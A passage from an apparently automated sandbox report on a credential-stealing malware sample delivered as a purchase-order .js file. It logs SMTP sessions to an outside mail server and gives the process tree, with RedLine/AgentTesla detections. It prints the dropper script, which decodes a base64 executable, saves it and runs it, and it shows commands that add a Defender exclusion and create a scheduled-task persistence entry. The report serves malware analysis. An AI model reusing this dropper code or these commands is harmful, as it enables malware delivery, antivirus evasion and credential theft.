                                                                                  Sep 26, 2024 09:21:49.888391972 CEST5876282951.195.88.199192.168.2.8220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 26 Sep 2024 07:21:49 +0000
                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                  220 and/or bulk e-mail.
                                                                                  Sep 26, 2024 09:21:49.888659954 CEST62829587192.168.2.851.195.88.199EHLO 061544
                                                                                  Sep 26, 2024 09:21:50.197284937 CEST5876282951.195.88.199192.168.2.8250-s82.gocheapweb.com Hello 061544 [8.46.123.33]
                                                                                  250-SIZE 52428800
                                                                                  250-8BITMIME
                                                                                  250-PIPELINING
                                                                                  250-PIPECONNECT
                                                                                  250-STARTTLS
                                                                                  250 HELP
                                                                                  Sep 26, 2024 09:21:50.197479010 CEST62829587192.168.2.851.195.88.199STARTTLS
                                                                                  Sep 26, 2024 09:21:50.379153967 CEST5876282951.195.88.199192.168.2.8220 TLS go ahead
                                                                                  Sep 26, 2024 09:23:15.946958065 CEST5876283551.195.88.199192.168.2.8220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 26 Sep 2024 07:23:15 +0000
                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                  220 and/or bulk e-mail.
                                                                                  Sep 26, 2024 09:23:15.947139978 CEST62835587192.168.2.851.195.88.199EHLO 061544
                                                                                  Sep 26, 2024 09:23:16.129198074 CEST5876283551.195.88.199192.168.2.8250-s82.gocheapweb.com Hello 061544 [8.46.123.33]
                                                                                  250-SIZE 52428800
                                                                                  250-8BITMIME
                                                                                  250-PIPELINING
                                                                                  250-PIPECONNECT
                                                                                  250-STARTTLS
                                                                                  250 HELP
                                                                                  Sep 26, 2024 09:23:16.130474091 CEST62835587192.168.2.851.195.88.199STARTTLS
                                                                                  Sep 26, 2024 09:23:16.311811924 CEST5876283551.195.88.199192.168.2.8220 TLS go ahead
                                                                                  Sep 26, 2024 09:23:24.650676966 CEST5876283651.195.88.199192.168.2.8220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 26 Sep 2024 07:23:24 +0000
                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                  220 and/or bulk e-mail.
                                                                                  Sep 26, 2024 09:23:24.650934935 CEST62836587192.168.2.851.195.88.199EHLO 061544
                                                                                  Sep 26, 2024 09:23:24.838011026 CEST5876283651.195.88.199192.168.2.8250-s82.gocheapweb.com Hello 061544 [8.46.123.33]
                                                                                  250-SIZE 52428800
                                                                                  250-8BITMIME
                                                                                  250-PIPELINING
                                                                                  250-PIPECONNECT
                                                                                  250-STARTTLS
                                                                                  250 HELP
                                                                                  Sep 26, 2024 09:23:24.838496923 CEST62836587192.168.2.851.195.88.199STARTTLS
                                                                                  Sep 26, 2024 09:23:25.026016951 CEST5876283651.195.88.199192.168.2.8220 TLS go ahead

                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:03:21:13
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js"
                                                                                  Imagebase:0x7ff6a68e0000
                                                                                  File size:170'496 bytes
                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:03:21:16
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:3'657'539 bytes
                                                                                  MD5 hash:E7114D96EC31D8CD1C0233BD949D1E0F
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:03:21:20
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0xfe0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:03:21:20
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:3'657'539 bytes
                                                                                  MD5 hash:E7114D96EC31D8CD1C0233BD949D1E0F
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:03:21:23
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0xfe0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:03:21:24
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:3'657'539 bytes
                                                                                  MD5 hash:E7114D96EC31D8CD1C0233BD949D1E0F
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:03:21:27
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0xfe0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:9
                                                                                  Start time:03:21:27
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:3'657'539 bytes
                                                                                  MD5 hash:E7114D96EC31D8CD1C0233BD949D1E0F
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:12
                                                                                  Start time:03:21:31
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0xfe0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:13
                                                                                  Start time:03:21:31
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:3'657'539 bytes
                                                                                  MD5 hash:E7114D96EC31D8CD1C0233BD949D1E0F
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:14
                                                                                  Start time:03:21:35
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0xfe0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:15
                                                                                  Start time:03:21:35
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:3'657'539 bytes
                                                                                  MD5 hash:E7114D96EC31D8CD1C0233BD949D1E0F
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:16
                                                                                  Start time:03:21:38
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0xfe0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000002.1731769518.0000000003189000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:17
                                                                                  Start time:03:21:39
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                  Imagebase:0xea0000
                                                                                  File size:231'936 bytes
                                                                                  MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:18
                                                                                  Start time:03:21:39
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                  Imagebase:0xe60000
                                                                                  File size:250'368 bytes
                                                                                  MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000000.1724575722.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000000.1724575722.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 79%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:19
                                                                                  Start time:03:21:40
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\build.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\build.exe"
                                                                                  Imagebase:0xf40000
                                                                                  File size:307'712 bytes
                                                                                  MD5 hash:3B6501FEEF6196F24163313A9F27DBFD
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.1941971499.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000002.1941971499.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000000.1729162835.0000000000F42000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 92%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:20
                                                                                  Start time:03:21:42
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                  Imagebase:0x340000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:21
                                                                                  Start time:03:21:42
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f
                                                                                  Imagebase:0xa80000
                                                                                  File size:187'904 bytes
                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:22
                                                                                  Start time:03:21:42
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6ee680000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:23
                                                                                  Start time:03:21:42
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6ee680000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:24
                                                                                  Start time:03:21:43
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                  Imagebase:0x70000
                                                                                  File size:231'936 bytes
                                                                                  MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:25
                                                                                  Start time:03:21:43
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6964.tmp.cmd""
                                                                                  Imagebase:0xa40000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:26
                                                                                  Start time:03:21:43
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6ee680000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:27
                                                                                  Start time:03:21:43
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:timeout 6
                                                                                  Imagebase:0x5f0000
                                                                                  File size:25'088 bytes
                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:28
                                                                                  Start time:03:21:44
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                  Imagebase:0xfe0000
                                                                                  File size:231'936 bytes
                                                                                  MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:29
                                                                                  Start time:03:21:46
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff605670000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:31
                                                                                  Start time:03:21:54
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                  Imagebase:0x7c0000
                                                                                  File size:231'936 bytes
                                                                                  MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Call Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  callgraph clusterC0 clusterC2C0 clusterC4C2 clusterC6C0 clusterC10C6 clusterC12C6 clusterC14C6 clusterC8C0 clusterC16C0 E1C0 entry:C0 F5C4 createElement E1C0->F5C4 F11C10 Open E1C0->F11C10 F13C12 Write E1C0->F13C12 F15C14 SaveToFile E1C0->F15C14 F9C8 GetSpecialFolder E1C0->F9C8 F17C16 Run E1C0->F17C16 F3C2 ActiveXObject("Microsoft.XMLDOM") F7C6 ActiveXObject("ADODB.Stream")

                                                                                  Script:

                                                                                  Code
                                                                                  0
                                                                                  var D = new ActiveXObject ( "Microsoft.XMLDOM" );
                                                                                    1
                                                                                    var E = D.createElement ( "t" );
                                                                                    • createElement("t") ➔
                                                                                    2
                                                                                    E.dataType = "bin.base64";
                                                                                      3
                                                                                      E.text = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4...
                                                                                        4
                                                                                        var b = new ActiveXObject ( "ADODB.Stream" );
                                                                                          5
                                                                                          var p = new ActiveXObject ( "Scripting.FileSystemObject" ).GetSpecialFolder ( 2 );
                                                                                          • GetSpecialFolder(2) ➔ C:\Users\hubert\AppData\Local\Temp
                                                                                          6
                                                                                          b.Type = 1;
                                                                                            7
                                                                                            b.Open ( );
                                                                                            • Open() ➔ undefined
                                                                                            8
                                                                                            b.Write ( E.nodeTypedValue );
                                                                                            • Write() ➔ undefined
                                                                                            9
                                                                                            b.SaveToFile ( p + "\\x.exe", 2 );
                                                                                            • SaveToFile("C:\Users\hubert\AppData\Local\Temp\x.exe",2) ➔ undefined
                                                                                            10
                                                                                            new ActiveXObject ( "WScript.Shell" ).Run ( p + "\\x.exe" );
                                                                                            • Run("C:\Users\hubert\AppData\Local\Temp\x.exe") ➔ 0
                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.4%
                                                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                                                              Signature Coverage:9.5%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:37
                                                                                              execution_graph 86263 4010e0 86266 401100 86263->86266 86265 4010f8 86267 401113 86266->86267 86269 401120 86267->86269 86270 401184 86267->86270 86271 40114c 86267->86271 86297 401182 86267->86297 86268 40112c DefWindowProcW 86268->86265 86269->86268 86325 401000 Shell_NotifyIconW setSBCS 86269->86325 86304 401250 86270->86304 86273 401151 86271->86273 86274 40119d 86271->86274 86277 401219 86273->86277 86278 40115d 86273->86278 86275 4011a3 86274->86275 86276 42afb4 86274->86276 86275->86269 86286 4011b6 KillTimer 86275->86286 86287 4011db SetTimer RegisterWindowMessageW 86275->86287 86320 40f190 10 API calls 86276->86320 86277->86269 86283 401225 86277->86283 86281 401163 86278->86281 86282 42b01d 86278->86282 86288 42afe9 86281->86288 86289 40116c 86281->86289 86282->86268 86324 4370f4 52 API calls 86282->86324 86336 468b0e 74 API calls setSBCS 86283->86336 86284 401193 86284->86265 86285 42b04f 86326 40e0c0 86285->86326 86319 401000 Shell_NotifyIconW setSBCS 86286->86319 86287->86284 86294 401204 CreatePopupMenu 86287->86294 86322 40f190 10 API calls 86288->86322 86289->86269 86296 401174 86289->86296 86294->86265 86321 45fd57 65 API calls setSBCS 86296->86321 86297->86268 86298 42afe4 86298->86284 86299 42b00e 86323 401a50 329 API calls 86299->86323 86300 4011c9 PostQuitMessage 86300->86265 86303 42afdc 86303->86268 86303->86298 86305 401262 setSBCS 86304->86305 86306 4012e8 86304->86306 86337 401b80 86305->86337 86306->86284 86308 40128c 86309 4012d1 KillTimer SetTimer 86308->86309 86310 4012bb 86308->86310 86311 4272ec 86308->86311 86309->86306 86312 4012c5 86310->86312 86313 42733f 86310->86313 86314 4272f4 Shell_NotifyIconW 86311->86314 86315 42731a Shell_NotifyIconW 86311->86315 86312->86309 86316 427393 Shell_NotifyIconW 86312->86316 86317 427348 Shell_NotifyIconW 86313->86317 86318 42736e Shell_NotifyIconW 86313->86318 86314->86309 86315->86309 86316->86309 86317->86309 86318->86309 86319->86300 86320->86284 86321->86303 86322->86299 86323->86297 86324->86297 86325->86285 86328 40e0e7 setSBCS 86326->86328 86327 40e142 86329 40e184 86327->86329 86435 4341e6 63 API calls __wcsicoll 86327->86435 86328->86327 86330 42729f DestroyIcon 86328->86330 86332 40e1a0 Shell_NotifyIconW 86329->86332 86333 4272db Shell_NotifyIconW 86329->86333 86330->86327 86334 401b80 54 API calls 86332->86334 86335 40e1ba 86334->86335 86335->86297 86336->86298 86338 401b9c 86337->86338 86339 401c7e 86337->86339 86359 4013c0 86338->86359 86339->86308 86342 42722b LoadStringW 86345 427246 86342->86345 86343 401bb9 86364 402160 86343->86364 86378 40e0a0 86345->86378 86346 401bcd 86348 427258 86346->86348 86349 401bda 86346->86349 86382 40d200 52 API calls 2 library calls 86348->86382 86349->86345 86350 401be4 86349->86350 86377 40d200 52 API calls 2 library calls 86350->86377 86353 427267 86354 42727b 86353->86354 86356 401bf3 setSBCS _wcscpy _wcsncpy 86353->86356 86383 40d200 52 API calls 2 library calls 86354->86383 86358 401c62 Shell_NotifyIconW 86356->86358 86357 427289 86358->86339 86384 4115d7 86359->86384 86365 426daa 86364->86365 86366 40216b _wcslen 86364->86366 86422 40c600 86365->86422 86369 402180 86366->86369 86370 40219e 86366->86370 86368 426db5 86368->86346 86421 403bd0 52 API calls ctype 86369->86421 86372 4013a0 52 API calls 86370->86372 86373 4021a5 86372->86373 86374 426db7 86373->86374 86376 4115d7 52 API calls 86373->86376 86375 402187 _memmove 86375->86346 86376->86375 86377->86356 86379 40e0b2 86378->86379 86380 40e0a8 86378->86380 86379->86356 86434 403c30 52 API calls _memmove 86380->86434 86382->86353 86383->86357 86385 4115e1 _malloc 86384->86385 86387 4013e4 86385->86387 86390 4115fd std::exception::exception 86385->86390 86398 4135bb 86385->86398 86395 4013a0 86387->86395 86388 41163b 86413 4180af 46 API calls std::exception::operator= 86388->86413 86390->86388 86412 41130a 51 API calls __cinit 86390->86412 86391 411645 86414 418105 RaiseException 86391->86414 86394 411656 86396 4115d7 52 API calls 86395->86396 86397 4013a7 86396->86397 86397->86342 86397->86343 86399 413638 _malloc 86398->86399 86407 4135c9 _malloc 86398->86407 86420 417f77 46 API calls __getptd_noexit 86399->86420 86402 4135f7 RtlAllocateHeap 86403 413630 86402->86403 86402->86407 86403->86385 86405 4135d4 86405->86407 86415 418901 46 API calls __NMSG_WRITE 86405->86415 86416 418752 46 API calls 6 library calls 86405->86416 86417 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86405->86417 86406 413624 86418 417f77 46 API calls __getptd_noexit 86406->86418 86407->86402 86407->86405 86407->86406 86410 413622 86407->86410 86419 417f77 46 API calls __getptd_noexit 86410->86419 86412->86388 86413->86391 86414->86394 86415->86405 86416->86405 86418->86410 86419->86403 86420->86403 86421->86375 86423 40c619 86422->86423 86424 40c60a 86422->86424 86423->86368 86424->86423 86427 4026f0 86424->86427 86426 426d7a _memmove 86426->86368 86428 426873 86427->86428 86429 4026ff 86427->86429 86430 4013a0 52 API calls 86428->86430 